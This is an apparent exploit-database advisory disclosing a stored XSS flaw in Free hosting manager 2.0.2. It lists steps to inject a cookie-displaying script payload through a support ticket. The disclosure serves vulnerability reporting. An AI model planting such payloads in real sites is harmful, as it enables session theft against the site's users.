# Exploit Title: Free hosting manager V2.0.2 Stored XSS
# Date: 19/12/2012
# Exploit Author: Lee Chung Eon
# Vendor by:
# Software Link: http://www.fhm-script.com/download.php
# Version: 2.0.2
# Category:Web Security
# Tested on: Windows xp / 7
+--------------------------------------------------------------------------+
 
Stored XSS-vulnerabilities
 
 
0. install
 
1. register complete
 
2. inject following code
 
<script>alert(document.cookie)</script>
 
3. into support --> ticket
 
4. Visit your profile and Can see the execution of injected script
 
------------------------------------------------------------------------------